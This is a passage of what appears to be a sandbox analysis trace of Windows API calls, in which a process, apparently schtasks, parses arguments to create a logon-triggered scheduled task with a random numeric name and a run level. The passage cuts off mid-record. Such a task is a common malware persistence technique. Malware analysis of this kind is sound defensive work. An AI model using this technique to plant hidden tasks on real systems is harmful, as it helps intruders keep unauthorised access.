GetThreadLocale () returned 0x409 [0074.023] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.023] lstrlenW (lpString="showsid") returned 7 [0074.023] GetThreadLocale () returned 0x409 [0074.023] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.023] SetLastError (dwErrCode=0x0) [0074.023] SetLastError (dwErrCode=0x0) [0074.024] lstrlenW (lpString="/create") returned 7 [0074.024] lstrlenW (lpString="-/") returned 2 [0074.024] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.024] lstrlenW (lpString="?") returned 1 [0074.024] lstrlenW (lpString="?") returned 1 [0074.024] GetProcessHeap () returned 0x2c0000 [0074.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d50 [0074.024] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.024] GetProcessHeap () returned 0x2c0000 [0074.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xa) returned 0x2d4d68 [0074.024] lstrlenW (lpString="create") returned 6 [0074.024] GetProcessHeap () returned 0x2c0000 [0074.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d80 [0074.024] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.024] GetProcessHeap () returned 0x2c0000 [0074.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5398 [0074.024] _vsnwprintf (in: _Buffer=0x2d4d68, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|?|") returned 3 [0074.024] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|create|") returned 8 [0074.024] lstrlenW (lpString="|?|") returned 3 [0074.024] lstrlenW (lpString="|create|") returned 8 [0074.024] SetLastError (dwErrCode=0x490) [0074.024] lstrlenW (lpString="create") returned 6 [0074.024] lstrlenW (lpString="create") returned 6 [0074.024] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.024] GetProcessHeap () returned 0x2c0000 [0074.024] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d68) returned 1 [0074.024] GetProcessHeap () returned 0x2c0000 [0074.024] RtlReAllocateHeap (Heap=0x2c0000, Flags=0xc, Ptr=0x2d4d68, Size=0x14) returned 0x2d53b8 [0074.024] lstrlenW (lpString="create") returned 6 [0074.024] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.024] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|create|") returned 8 [0074.024] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|create|") returned 8 [0074.024] lstrlenW (lpString="|create|") returned 8 [0074.024] lstrlenW (lpString="|create|") returned 8 [0074.025] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0074.025] SetLastError (dwErrCode=0x0) [0074.025] SetLastError (dwErrCode=0x0) [0074.025] SetLastError (dwErrCode=0x0) [0074.025] lstrlenW (lpString="/sc") returned 3 [0074.025] lstrlenW (lpString="-/") returned 2 [0074.025] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.025] lstrlenW (lpString="?") returned 1 [0074.025] lstrlenW (lpString="?") returned 1 [0074.025] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.025] lstrlenW (lpString="sc") returned 2 [0074.025] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.025] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|?|") returned 3 [0074.025] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.025] lstrlenW (lpString="|?|") returned 3 [0074.025] lstrlenW (lpString="|sc|") returned 4 [0074.025] SetLastError (dwErrCode=0x490) [0074.025] lstrlenW (lpString="create") returned 6 [0074.025] lstrlenW (lpString="create") returned 6 [0074.025] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.025] lstrlenW (lpString="sc") returned 2 [0074.025] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.025] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|create|") returned 8 [0074.025] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.025] lstrlenW (lpString="|create|") returned 8 [0074.025] lstrlenW (lpString="|sc|") returned 4 [0074.025] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0074.025] SetLastError (dwErrCode=0x490) [0074.025] lstrlenW (lpString="delete") returned 6 [0074.025] lstrlenW (lpString="delete") returned 6 [0074.025] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.025] lstrlenW (lpString="sc") returned 2 [0074.025] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.025] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|delete|") returned 8 [0074.026] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.026] lstrlenW (lpString="|delete|") returned 8 [0074.026] lstrlenW (lpString="|sc|") returned 4 [0074.026] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0074.026] SetLastError (dwErrCode=0x490) [0074.026] lstrlenW (lpString="query") returned 5 [0074.026] lstrlenW (lpString="query") returned 5 [0074.026] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.026] lstrlenW (lpString="sc") returned 2 [0074.026] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.026] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x8, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|query|") returned 7 [0074.026] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.026] lstrlenW (lpString="|query|") returned 7 [0074.026] lstrlenW (lpString="|sc|") returned 4 [0074.026] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0074.026] SetLastError (dwErrCode=0x490) [0074.026] lstrlenW (lpString="change") returned 6 [0074.026] lstrlenW (lpString="change") returned 6 [0074.026] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.026] lstrlenW (lpString="sc") returned 2 [0074.026] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.026] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|change|") returned 8 [0074.026] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.026] lstrlenW (lpString="|change|") returned 8 [0074.026] lstrlenW (lpString="|sc|") returned 4 [0074.026] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0074.026] SetLastError (dwErrCode=0x490) [0074.026] lstrlenW (lpString="run") returned 3 [0074.026] lstrlenW (lpString="run") returned 3 [0074.026] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.026] lstrlenW (lpString="sc") returned 2 [0074.026] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.026] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|run|") returned 5 [0074.026] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.027] lstrlenW (lpString="|run|") returned 5 [0074.027] lstrlenW (lpString="|sc|") returned 4 [0074.027] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0074.027] SetLastError (dwErrCode=0x490) [0074.027] lstrlenW (lpString="end") returned 3 [0074.027] lstrlenW (lpString="end") returned 3 [0074.027] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.027] lstrlenW (lpString="sc") returned 2 [0074.027] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.027] _vsnwprintf (in: _Buffer=0x2d53b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|end|") returned 5 [0074.027] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.027] lstrlenW (lpString="|end|") returned 5 [0074.027] lstrlenW (lpString="|sc|") returned 4 [0074.027] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0074.027] SetLastError (dwErrCode=0x490) [0074.027] lstrlenW (lpString="showsid") returned 7 [0074.027] lstrlenW (lpString="showsid") returned 7 [0074.027] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.027] GetProcessHeap () returned 0x2c0000 [0074.027] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53b8) returned 1 [0074.027] GetProcessHeap () returned 0x2c0000 [0074.027] RtlReAllocateHeap (Heap=0x2c0000, Flags=0xc, Ptr=0x2d53b8, Size=0x16) returned 0x2d53d8 [0074.027] lstrlenW (lpString="sc") returned 2 [0074.027] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.027] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0xa, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|showsid|") returned 9 [0074.027] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|sc|") returned 4 [0074.027] lstrlenW (lpString="|showsid|") returned 9 [0074.027] lstrlenW (lpString="|sc|") returned 4 [0074.027] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0074.027] SetLastError (dwErrCode=0x490) [0074.027] SetLastError (dwErrCode=0x490) [0074.027] SetLastError (dwErrCode=0x0) [0074.027] lstrlenW (lpString="/sc") returned 3 [0074.027] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0074.027] SetLastError (dwErrCode=0x490) [0074.027] SetLastError (dwErrCode=0x0) [0074.028] lstrlenW (lpString="/sc") returned 3 [0074.028] GetProcessHeap () returned 0x2c0000 [0074.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x8) returned 0x2d69d8 [0074.028] GetProcessHeap () returned 0x2c0000 [0074.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d53b8 [0074.028] SetLastError (dwErrCode=0x0) [0074.028] SetLastError (dwErrCode=0x0) [0074.028] lstrlenW (lpString="onlogon") returned 7 [0074.028] lstrlenW (lpString="-/") returned 2 [0074.028] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0074.028] SetLastError (dwErrCode=0x490) [0074.028] SetLastError (dwErrCode=0x490) [0074.028] SetLastError (dwErrCode=0x0) [0074.028] lstrlenW (lpString="onlogon") returned 7 [0074.028] StrChrIW (lpStart="onlogon", wMatch=0x3a) returned 0x0 [0074.028] SetLastError (dwErrCode=0x490) [0074.028] SetLastError (dwErrCode=0x0) [0074.028] lstrlenW (lpString="onlogon") returned 7 [0074.028] GetProcessHeap () returned 0x2c0000 [0074.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d68 [0074.028] GetProcessHeap () returned 0x2c0000 [0074.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d53f8 [0074.028] SetLastError (dwErrCode=0x0) [0074.028] SetLastError (dwErrCode=0x0) [0074.028] lstrlenW (lpString="/tn") returned 3 [0074.028] lstrlenW (lpString="-/") returned 2 [0074.028] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.028] lstrlenW (lpString="?") returned 1 [0074.028] lstrlenW (lpString="?") returned 1 [0074.028] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.028] lstrlenW (lpString="tn") returned 2 [0074.028] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.028] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|?|") returned 3 [0074.028] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.028] lstrlenW (lpString="|?|") returned 3 [0074.028] lstrlenW (lpString="|tn|") returned 4 [0074.028] SetLastError (dwErrCode=0x490) [0074.028] lstrlenW (lpString="create") returned 6 [0074.028] lstrlenW (lpString="create") returned 6 [0074.029] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.029] lstrlenW (lpString="tn") returned 2 [0074.029] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.029] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|create|") returned 8 [0074.029] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.029] lstrlenW (lpString="|create|") returned 8 [0074.029] lstrlenW (lpString="|tn|") returned 4 [0074.029] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0074.029] SetLastError (dwErrCode=0x490) [0074.029] lstrlenW (lpString="delete") returned 6 [0074.029] lstrlenW (lpString="delete") returned 6 [0074.029] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.029] lstrlenW (lpString="tn") returned 2 [0074.029] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.029] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|delete|") returned 8 [0074.029] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.029] lstrlenW (lpString="|delete|") returned 8 [0074.029] lstrlenW (lpString="|tn|") returned 4 [0074.029] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0074.029] SetLastError (dwErrCode=0x490) [0074.029] lstrlenW (lpString="query") returned 5 [0074.029] lstrlenW (lpString="query") returned 5 [0074.029] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.029] lstrlenW (lpString="tn") returned 2 [0074.029] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.029] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x8, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|query|") returned 7 [0074.029] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.029] lstrlenW (lpString="|query|") returned 7 [0074.029] lstrlenW (lpString="|tn|") returned 4 [0074.029] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0074.029] SetLastError (dwErrCode=0x490) [0074.029] lstrlenW (lpString="change") returned 6 [0074.030] lstrlenW (lpString="change") returned 6 [0074.030] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.030] lstrlenW (lpString="tn") returned 2 [0074.030] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.030] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|change|") returned 8 [0074.030] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.030] lstrlenW (lpString="|change|") returned 8 [0074.030] lstrlenW (lpString="|tn|") returned 4 [0074.030] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0074.030] SetLastError (dwErrCode=0x490) [0074.030] lstrlenW (lpString="run") returned 3 [0074.030] lstrlenW (lpString="run") returned 3 [0074.030] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.030] lstrlenW (lpString="tn") returned 2 [0074.030] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.030] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|run|") returned 5 [0074.030] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.030] lstrlenW (lpString="|run|") returned 5 [0074.030] lstrlenW (lpString="|tn|") returned 4 [0074.030] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0074.030] SetLastError (dwErrCode=0x490) [0074.030] lstrlenW (lpString="end") returned 3 [0074.030] lstrlenW (lpString="end") returned 3 [0074.030] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.030] lstrlenW (lpString="tn") returned 2 [0074.030] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.030] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|end|") returned 5 [0074.030] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.030] lstrlenW (lpString="|end|") returned 5 [0074.030] lstrlenW (lpString="|tn|") returned 4 [0074.030] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0074.030] SetLastError (dwErrCode=0x490) [0074.030] lstrlenW (lpString="showsid") returned 7 [0074.030] lstrlenW (lpString="showsid") returned 7 [0074.030] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.031] lstrlenW (lpString="tn") returned 2 [0074.031] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.031] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0xa, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|showsid|") returned 9 [0074.031] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tn|") returned 4 [0074.031] lstrlenW (lpString="|showsid|") returned 9 [0074.031] lstrlenW (lpString="|tn|") returned 4 [0074.031] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0074.031] SetLastError (dwErrCode=0x490) [0074.031] SetLastError (dwErrCode=0x490) [0074.031] SetLastError (dwErrCode=0x0) [0074.031] lstrlenW (lpString="/tn") returned 3 [0074.031] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0074.031] SetLastError (dwErrCode=0x490) [0074.031] SetLastError (dwErrCode=0x0) [0074.031] lstrlenW (lpString="/tn") returned 3 [0074.031] GetProcessHeap () returned 0x2c0000 [0074.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x8) returned 0x2d69e8 [0074.031] GetProcessHeap () returned 0x2c0000 [0074.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5418 [0074.031] SetLastError (dwErrCode=0x0) [0074.031] SetLastError (dwErrCode=0x0) [0074.031] lstrlenW (lpString="2620738370") returned 10 [0074.031] lstrlenW (lpString="-/") returned 2 [0074.031] StrChrIW (lpStart="-/", wMatch=0x32) returned 0x0 [0074.031] SetLastError (dwErrCode=0x490) [0074.031] SetLastError (dwErrCode=0x490) [0074.031] SetLastError (dwErrCode=0x0) [0074.031] lstrlenW (lpString="2620738370") returned 10 [0074.031] StrChrIW (lpStart="2620738370", wMatch=0x3a) returned 0x0 [0074.031] SetLastError (dwErrCode=0x490) [0074.031] SetLastError (dwErrCode=0x0) [0074.031] lstrlenW (lpString="2620738370") returned 10 [0074.031] GetProcessHeap () returned 0x2c0000 [0074.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x16) returned 0x2d5438 [0074.031] GetProcessHeap () returned 0x2c0000 [0074.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5458 [0074.031] SetLastError (dwErrCode=0x0) [0074.031] SetLastError (dwErrCode=0x0) [0074.032] lstrlenW (lpString="/rl") returned 3 [0074.032] lstrlenW (lpString="-/") returned 2 [0074.032] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.032] lstrlenW (lpString="?") returned 1 [0074.032] lstrlenW (lpString="?") returned 1 [0074.032] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.032] lstrlenW (lpString="rl") returned 2 [0074.032] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.032] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|?|") returned 3 [0074.032] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.032] lstrlenW (lpString="|?|") returned 3 [0074.032] lstrlenW (lpString="|rl|") returned 4 [0074.032] SetLastError (dwErrCode=0x490) [0074.032] lstrlenW (lpString="create") returned 6 [0074.032] lstrlenW (lpString="create") returned 6 [0074.032] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.032] lstrlenW (lpString="rl") returned 2 [0074.032] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.032] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|create|") returned 8 [0074.032] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.032] lstrlenW (lpString="|create|") returned 8 [0074.032] lstrlenW (lpString="|rl|") returned 4 [0074.032] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0074.032] SetLastError (dwErrCode=0x490) [0074.032] lstrlenW (lpString="delete") returned 6 [0074.032] lstrlenW (lpString="delete") returned 6 [0074.032] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.032] lstrlenW (lpString="rl") returned 2 [0074.032] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.032] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|delete|") returned 8 [0074.032] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.032] lstrlenW (lpString="|delete|") returned 8 [0074.032] lstrlenW (lpString="|rl|") returned 4 [0074.032] StrStrIW (lpFirst="|delete|", lpSrch="|rl|") returned 0x0 [0074.033] SetLastError (dwErrCode=0x490) [0074.033] lstrlenW (lpString="query") returned 5 [0074.033] lstrlenW (lpString="query") returned 5 [0074.033] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.033] lstrlenW (lpString="rl") returned 2 [0074.033] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.033] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x8, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|query|") returned 7 [0074.033] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.033] lstrlenW (lpString="|query|") returned 7 [0074.033] lstrlenW (lpString="|rl|") returned 4 [0074.033] StrStrIW (lpFirst="|query|", lpSrch="|rl|") returned 0x0 [0074.033] SetLastError (dwErrCode=0x490) [0074.033] lstrlenW (lpString="change") returned 6 [0074.033] lstrlenW (lpString="change") returned 6 [0074.033] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.033] lstrlenW (lpString="rl") returned 2 [0074.033] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.033] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|change|") returned 8 [0074.033] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.033] lstrlenW (lpString="|change|") returned 8 [0074.033] lstrlenW (lpString="|rl|") returned 4 [0074.033] StrStrIW (lpFirst="|change|", lpSrch="|rl|") returned 0x0 [0074.033] SetLastError (dwErrCode=0x490) [0074.033] lstrlenW (lpString="run") returned 3 [0074.033] lstrlenW (lpString="run") returned 3 [0074.033] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.033] lstrlenW (lpString="rl") returned 2 [0074.033] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.033] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|run|") returned 5 [0074.033] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.033] lstrlenW (lpString="|run|") returned 5 [0074.033] lstrlenW (lpString="|rl|") returned 4 [0074.033] StrStrIW (lpFirst="|run|", lpSrch="|rl|") returned 0x0 [0074.033] SetLastError (dwErrCode=0x490) [0074.034] lstrlenW (lpString="end") returned 3 [0074.034] lstrlenW (lpString="end") returned 3 [0074.034] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.034] lstrlenW (lpString="rl") returned 2 [0074.034] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.034] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|end|") returned 5 [0074.034] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.034] lstrlenW (lpString="|end|") returned 5 [0074.034] lstrlenW (lpString="|rl|") returned 4 [0074.034] StrStrIW (lpFirst="|end|", lpSrch="|rl|") returned 0x0 [0074.034] SetLastError (dwErrCode=0x490) [0074.034] lstrlenW (lpString="showsid") returned 7 [0074.034] lstrlenW (lpString="showsid") returned 7 [0074.034] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.034] lstrlenW (lpString="rl") returned 2 [0074.034] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.034] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0xa, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|showsid|") returned 9 [0074.034] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|rl|") returned 4 [0074.034] lstrlenW (lpString="|showsid|") returned 9 [0074.034] lstrlenW (lpString="|rl|") returned 4 [0074.034] StrStrIW (lpFirst="|showsid|", lpSrch="|rl|") returned 0x0 [0074.034] SetLastError (dwErrCode=0x490) [0074.034] SetLastError (dwErrCode=0x490) [0074.034] SetLastError 